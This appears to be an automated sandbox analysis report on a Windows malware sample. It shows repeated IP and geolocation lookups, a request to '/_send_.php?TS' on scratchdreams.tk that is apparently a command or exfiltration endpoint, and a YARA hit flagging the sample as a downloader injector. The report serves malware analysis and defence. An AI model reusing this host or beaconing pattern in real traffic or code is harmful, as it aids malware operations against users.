                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 30 32 2e 31 36 35 2e 34 38 2e 34 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 102.165.48.43</body></html>


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                5192.168.2.749710193.122.6.168806880C:\Users\user\Desktop\PT98765445670009.scr.exe
                                                TimestampBytes transferredDirectionData
                                                Mar 27, 2024 11:24:12.108155012 CET151OUTGET / HTTP/1.1
                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                Host: checkip.dyndns.org
                                                Connection: Keep-Alive
                                                Mar 27, 2024 11:24:12.289089918 CET322INHTTP/1.1 200 OK
                                                Date: Wed, 27 Mar 2024 10:24:12 GMT
                                                Content-Type: text/html
                                                Content-Length: 105
                                                Connection: keep-alive
                                                Cache-Control: no-cache
                                                Pragma: no-cache
                                                X-Request-ID: bfbfb4924607b906eafbac6e805c73ad
                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 30 32 2e 31 36 35 2e 34 38 2e 34 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 102.165.48.43</body></html>


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                6192.168.2.749712193.122.6.168806880C:\Users\user\Desktop\PT98765445670009.scr.exe
                                                TimestampBytes transferredDirectionData
                                                Mar 27, 2024 11:24:13.213402033 CET151OUTGET / HTTP/1.1
                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                Host: checkip.dyndns.org
                                                Connection: Keep-Alive
                                                Mar 27, 2024 11:24:13.397728920 CET322INHTTP/1.1 200 OK
                                                Date: Wed, 27 Mar 2024 10:24:13 GMT
                                                Content-Type: text/html
                                                Content-Length: 105
                                                Connection: keep-alive
                                                Cache-Control: no-cache
                                                Pragma: no-cache
                                                X-Request-ID: d3f78e6bac064e0a0dfe851d97092180
                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 30 32 2e 31 36 35 2e 34 38 2e 34 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 102.165.48.43</body></html>


                                                HTTPS Proxied Packets

                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                0192.168.2.749700172.67.177.1344436880C:\Users\user\Desktop\PT98765445670009.scr.exe
                                                TimestampBytes transferredDirectionData
                                                2024-03-27 10:24:06 UTC86OUTGET /xml/102.165.48.43 HTTP/1.1
                                                Host: reallyfreegeoip.org
                                                Connection: Keep-Alive
                                                2024-03-27 10:24:06 UTC693INHTTP/1.1 200 OK
                                                Date: Wed, 27 Mar 2024 10:24:06 GMT
                                                Content-Type: application/xml
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                access-control-allow-origin: *
                                                vary: Accept-Encoding
                                                Cache-Control: max-age=86400
                                                CF-Cache-Status: MISS
                                                Last-Modified: Wed, 27 Mar 2024 10:24:06 GMT
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bqwVxyHKGQLrH9nRjvM4kUskMrFQufv2rqcNG2tPxm3Q9Fu22PbAtTggXrCcX4yBFwLBizepH34RyclEZhwvnmJAQ7RJhurZZW3rZIH4bgKO%2FBCo2i4Fub2OnO%2F7UeLjaD9cJpcS"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 86aeab383f832419-IAD
                                                alt-svc: h3=":443"; ma=86400
                                                2024-03-27 10:24:06 UTC366INData Raw: 31 36 37 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 30 32 2e 31 36 35 2e 34 38 2e 34 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 50 41 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 50 65 6e 6e 73 79 6c 76 61 6e 69 61 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 38 34 31 31 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65
                                                Data Ascii: 167<Response><IP>102.165.48.43</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>PA</RegionCode><RegionName>Pennsylvania</RegionName><City></City><ZipCode>18411</ZipCode><TimeZone>America/New_York</Time
                                                2024-03-27 10:24:06 UTC5INData Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                1192.168.2.749701172.67.177.1344436880C:\Users\user\Desktop\PT98765445670009.scr.exe
                                                TimestampBytes transferredDirectionData
                                                2024-03-27 10:24:07 UTC62OUTGET /xml/102.165.48.43 HTTP/1.1
                                                Host: reallyfreegeoip.org
                                                2024-03-27 10:24:07 UTC701INHTTP/1.1 200 OK
                                                Date: Wed, 27 Mar 2024 10:24:07 GMT
                                                Content-Type: application/xml
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                access-control-allow-origin: *
                                                vary: Accept-Encoding
                                                Cache-Control: max-age=86400
                                                CF-Cache-Status: MISS
                                                Last-Modified: Wed, 27 Mar 2024 10:24:07 GMT
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bFpabAWoOODQu%2BLmL2T%2Bp1T2SES1iAivdh72WDuBUoJ59gO4Q0ikIbO2JYZ%2FsqccNyDMZn7z7ObtwBqxy4Tf092DsTcucS7ZaP4yHd8bIIAeDuGuPgvSI%2Fl%2B3Ab6Fg0330C%2BaMyU"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 86aeab3e08028263-IAD
                                                alt-svc: h3=":443"; ma=86400
                                                2024-03-27 10:24:07 UTC366INData Raw: 31 36 37 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 30 32 2e 31 36 35 2e 34 38 2e 34 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 50 41 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 50 65 6e 6e 73 79 6c 76 61 6e 69 61 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 38 34 31 31 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65
                                                Data Ascii: 167<Response><IP>102.165.48.43</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>PA</RegionCode><RegionName>Pennsylvania</RegionName><City></City><ZipCode>18411</ZipCode><TimeZone>America/New_York</Time
                                                2024-03-27 10:24:07 UTC5INData Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                2192.168.2.749703172.67.177.1344436880C:\Users\user\Desktop\PT98765445670009.scr.exe
                                                TimestampBytes transferredDirectionData
                                                2024-03-27 10:24:08 UTC62OUTGET /xml/102.165.48.43 HTTP/1.1
                                                Host: reallyfreegeoip.org
                                                2024-03-27 10:24:08 UTC703INHTTP/1.1 200 OK
                                                Date: Wed, 27 Mar 2024 10:24:08 GMT
                                                Content-Type: application/xml
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                access-control-allow-origin: *
                                                vary: Accept-Encoding
                                                Cache-Control: max-age=86400
                                                CF-Cache-Status: MISS
                                                Last-Modified: Wed, 27 Mar 2024 10:24:08 GMT
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KN%2FjHI4Yj%2F0GUwAAuXAhF%2FEv4Tba97m%2B6Q2oWBzZiUK1Ew2iNzQEr4VBW7k0HvwdMwiJzDF4dvCECK%2FMCAYHuZTwN6TQVGAWzWAuJIBRhc9Wb4cl5BcR%2BUpGNPgu2osnuUc%2BPhcl"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 86aeab44e9cc584e-IAD
                                                alt-svc: h3=":443"; ma=86400
                                                2024-03-27 10:24:08 UTC366INData Raw: 31 36 37 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 30 32 2e 31 36 35 2e 34 38 2e 34 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 50 41 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 50 65 6e 6e 73 79 6c 76 61 6e 69 61 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 38 34 31 31 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65
                                                Data Ascii: 167<Response><IP>102.165.48.43</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>PA</RegionCode><RegionName>Pennsylvania</RegionName><City></City><ZipCode>18411</ZipCode><TimeZone>America/New_York</Time
                                                2024-03-27 10:24:08 UTC5INData Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                3192.168.2.749705172.67.177.1344436880C:\Users\user\Desktop\PT98765445670009.scr.exe
                                                TimestampBytes transferredDirectionData
                                                2024-03-27 10:24:09 UTC86OUTGET /xml/102.165.48.43 HTTP/1.1
                                                Host: reallyfreegeoip.org
                                                Connection: Keep-Alive
                                                2024-03-27 10:24:09 UTC689INHTTP/1.1 200 OK
                                                Date: Wed, 27 Mar 2024 10:24:09 GMT
                                                Content-Type: application/xml
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                access-control-allow-origin: *
                                                vary: Accept-Encoding
                                                Cache-Control: max-age=86400
                                                CF-Cache-Status: MISS
                                                Last-Modified: Wed, 27 Mar 2024 10:24:09 GMT
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1XHWcLQkrTvcWmaUrH4eQmzLt3WAev4hfQqanXiUB0wP7NpnRAKKu47eLPsjiwjdYPCh5M5C3XReIz0ZwBSwC7oPYvJyQaWR3DjNID986qShMREUNSiayzPffj1pZqbYEi5G4smi"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 86aeab4c0c886908-IAD
                                                alt-svc: h3=":443"; ma=86400
                                                2024-03-27 10:24:09 UTC366INData Raw: 31 36 37 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 30 32 2e 31 36 35 2e 34 38 2e 34 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 50 41 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 50 65 6e 6e 73 79 6c 76 61 6e 69 61 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 38 34 31 31 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65
                                                Data Ascii: 167<Response><IP>102.165.48.43</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>PA</RegionCode><RegionName>Pennsylvania</RegionName><City></City><ZipCode>18411</ZipCode><TimeZone>America/New_York</Time
                                                2024-03-27 10:24:09 UTC5INData Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                4192.168.2.749707172.67.177.1344436880C:\Users\user\Desktop\PT98765445670009.scr.exe
                                                TimestampBytes transferredDirectionData
                                                2024-03-27 10:24:10 UTC86OUTGET /xml/102.165.48.43 HTTP/1.1
                                                Host: reallyfreegeoip.org
                                                Connection: Keep-Alive
                                                2024-03-27 10:24:10 UTC698INHTTP/1.1 200 OK
                                                Date: Wed, 27 Mar 2024 10:24:10 GMT
                                                Content-Type: application/xml
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                access-control-allow-origin: *
                                                vary: Accept-Encoding
                                                Cache-Control: max-age=86400
                                                CF-Cache-Status: HIT
                                                Age: 3
                                                Last-Modified: Wed, 27 Mar 2024 10:24:07 GMT
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sL9ZwyDsPVH5ZdbSihLAkl7EEKDykiQuEitSic%2BInZ0Y4P3e7EeMph8bQcFRYns2ed0zG7sqIIZmjpjodQtJ8uW7y1oiRJQVjOUzh3hfwW27vC1lN9sdUoWaXAOmqF1PX5byFIoH"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 86aeab52ff208203-IAD
                                                alt-svc: h3=":443"; ma=86400
                                                2024-03-27 10:24:10 UTC366INData Raw: 31 36 37 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 30 32 2e 31 36 35 2e 34 38 2e 34 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 50 41 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 50 65 6e 6e 73 79 6c 76 61 6e 69 61 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 38 34 31 31 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65
                                                Data Ascii: 167<Response><IP>102.165.48.43</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>PA</RegionCode><RegionName>Pennsylvania</RegionName><City></City><ZipCode>18411</ZipCode><TimeZone>America/New_York</Time
                                                2024-03-27 10:24:10 UTC5INData Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                5192.168.2.749709172.67.177.1344436880C:\Users\user\Desktop\PT98765445670009.scr.exe
                                                TimestampBytes transferredDirectionData
                                                2024-03-27 10:24:11 UTC86OUTGET /xml/102.165.48.43 HTTP/1.1
                                                Host: reallyfreegeoip.org
                                                Connection: Keep-Alive
                                                2024-03-27 10:24:11 UTC695INHTTP/1.1 200 OK
                                                Date: Wed, 27 Mar 2024 10:24:11 GMT
                                                Content-Type: application/xml
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                access-control-allow-origin: *
                                                vary: Accept-Encoding
                                                Cache-Control: max-age=86400
                                                CF-Cache-Status: MISS
                                                Last-Modified: Wed, 27 Mar 2024 10:24:11 GMT
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=J0Ywr4uOvWyzvO9aktVmUw%2FTFcNIcSjPE72G90Hb0nP2ba5KJa5P4CzbQQanyVkBQmdgRbihxwNYhjJZ6fBLm2atdRAHSkJew6E%2FCMelnKqiTJEa%2FD2vpdHq62HlpwfPfotCX0nZ"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 86aeab5819a2084d-IAD
                                                alt-svc: h3=":443"; ma=86400
                                                2024-03-27 10:24:11 UTC366INData Raw: 31 36 37 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 30 32 2e 31 36 35 2e 34 38 2e 34 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 50 41 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 50 65 6e 6e 73 79 6c 76 61 6e 69 61 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 38 34 31 31 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65
                                                Data Ascii: 167<Response><IP>102.165.48.43</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>PA</RegionCode><RegionName>Pennsylvania</RegionName><City></City><ZipCode>18411</ZipCode><TimeZone>America/New_York</Time
                                                2024-03-27 10:24:11 UTC5INData Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                6192.168.2.749711172.67.177.1344436880C:\Users\user\Desktop\PT98765445670009.scr.exe
                                                TimestampBytes transferredDirectionData
                                                2024-03-27 10:24:12 UTC86OUTGET /xml/102.165.48.43 HTTP/1.1
                                                Host: reallyfreegeoip.org
                                                Connection: Keep-Alive
                                                2024-03-27 10:24:13 UTC697INHTTP/1.1 200 OK
                                                Date: Wed, 27 Mar 2024 10:24:12 GMT
                                                Content-Type: application/xml
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                access-control-allow-origin: *
                                                vary: Accept-Encoding
                                                Cache-Control: max-age=86400
                                                CF-Cache-Status: MISS
                                                Last-Modified: Wed, 27 Mar 2024 10:24:12 GMT
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zvlXXu9omYrYBU0rgwbbHwk%2FRtd1daUngWs%2FjiPS7LND3w7F7e9n1BM9waTgWYoduYMLPcVppUaDLOHYw12%2B4z971NeGK8r6W4HhiEvtOXlHDMLV0xjfJJWMyY5A4mfI8gWcwjN%2F"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 86aeab5f2b323b78-IAD
                                                alt-svc: h3=":443"; ma=86400
                                                2024-03-27 10:24:13 UTC366INData Raw: 31 36 37 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 30 32 2e 31 36 35 2e 34 38 2e 34 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 50 41 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 50 65 6e 6e 73 79 6c 76 61 6e 69 61 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 38 34 31 31 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65
                                                Data Ascii: 167<Response><IP>102.165.48.43</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>PA</RegionCode><RegionName>Pennsylvania</RegionName><City></City><ZipCode>18411</ZipCode><TimeZone>America/New_York</Time
                                                2024-03-27 10:24:13 UTC5INData Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                7192.168.2.749713172.67.177.1344436880C:\Users\user\Desktop\PT98765445670009.scr.exe
                                                TimestampBytes transferredDirectionData
                                                2024-03-27 10:24:13 UTC86OUTGET /xml/102.165.48.43 HTTP/1.1
                                                Host: reallyfreegeoip.org
                                                Connection: Keep-Alive
                                                2024-03-27 10:24:13 UTC710INHTTP/1.1 200 OK
                                                Date: Wed, 27 Mar 2024 10:24:13 GMT
                                                Content-Type: application/xml
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                access-control-allow-origin: *
                                                vary: Accept-Encoding
                                                Cache-Control: max-age=86400
                                                CF-Cache-Status: HIT
                                                Age: 7
                                                Last-Modified: Wed, 27 Mar 2024 10:24:06 GMT
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=L4itUl8OG734m29nR3yiDy83fnhY3%2FKgR0kzohkEU9%2BA2CEmIjeGMjFQwxa5kqyaDi3qJte%2B1ov5QhC4R%2BERkkojRnn0A3vuToQggdfOfQnkvDf%2FDBs9cwqKSG9UcH%2FBNjB5VD%2Fb"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 86aeab662e782413-IAD
                                                alt-svc: h3=":443"; ma=86400
                                                2024-03-27 10:24:13 UTC366INData Raw: 31 36 37 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 30 32 2e 31 36 35 2e 34 38 2e 34 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 50 41 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 50 65 6e 6e 73 79 6c 76 61 6e 69 61 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 38 34 31 31 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65
                                                Data Ascii: 167<Response><IP>102.165.48.43</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>PA</RegionCode><RegionName>Pennsylvania</RegionName><City></City><ZipCode>18411</ZipCode><TimeZone>America/New_York</Time
                                                2024-03-27 10:24:13 UTC5INData Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                8192.168.2.749714104.21.27.854436880C:\Users\user\Desktop\PT98765445670009.scr.exe
                                                TimestampBytes transferredDirectionData
                                                2024-03-27 10:24:14 UTC79OUTGET /_send_.php?TS HTTP/1.1
                                                Host: scratchdreams.tk
                                                Connection: Keep-Alive
                                                2024-03-27 10:24:45 UTC739INHTTP/1.1 522
                                                Date: Wed, 27 Mar 2024 10:24:45 GMT
                                                Content-Type: text/plain; charset=UTF-8
                                                Content-Length: 15
                                                Connection: close
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YQfq3sw%2BJHrpevX3A479g1aYfAFj%2BEQqu8UkIagv5gUEghg2QCyKfqPl47y40DEw1q8ry0e5mY2u%2FC8tkzQNU8hkfh%2FzzT4UC8syZ8iGaAly53FHTHR40JIeIRHA%2FiHXzhR5"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                X-Frame-Options: SAMEORIGIN
                                                Referrer-Policy: same-origin
                                                Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                Server: cloudflare
                                                CF-RAY: 86aeab6b2fa73b89-IAD
                                                alt-svc: h3=":443"; ma=86400
                                                2024-03-27 10:24:45 UTC15INData Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 35 32 32
                                                Data Ascii: error code: 522


                                                Statistics

                                                CPU Usage

                                                Click to jump to process

                                                Memory Usage

                                                Click to jump to process

                                                High Level Behavior Distribution

                                                Click to dive into process behavior distribution

                                                Behavior

                                                Click to jump to process

                                                System Behavior

                                                General

                                                Target ID:1
                                                Start time:11:24:00
                                                Start date:27/03/2024
                                                Path:C:\Users\user\Desktop\PT98765445670009.scr.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Users\user\Desktop\PT98765445670009.scr.exe"
                                                Imagebase:0xab0000
                                                File size:638'464 bytes
                                                MD5 hash:90A34E7D570FA7C219EB5F1F193611BA
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: MALWARE_Win_DLInjector02, Description: Detects downloader injector, Source: 00000001.00000002.1240469053.0000000005500000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
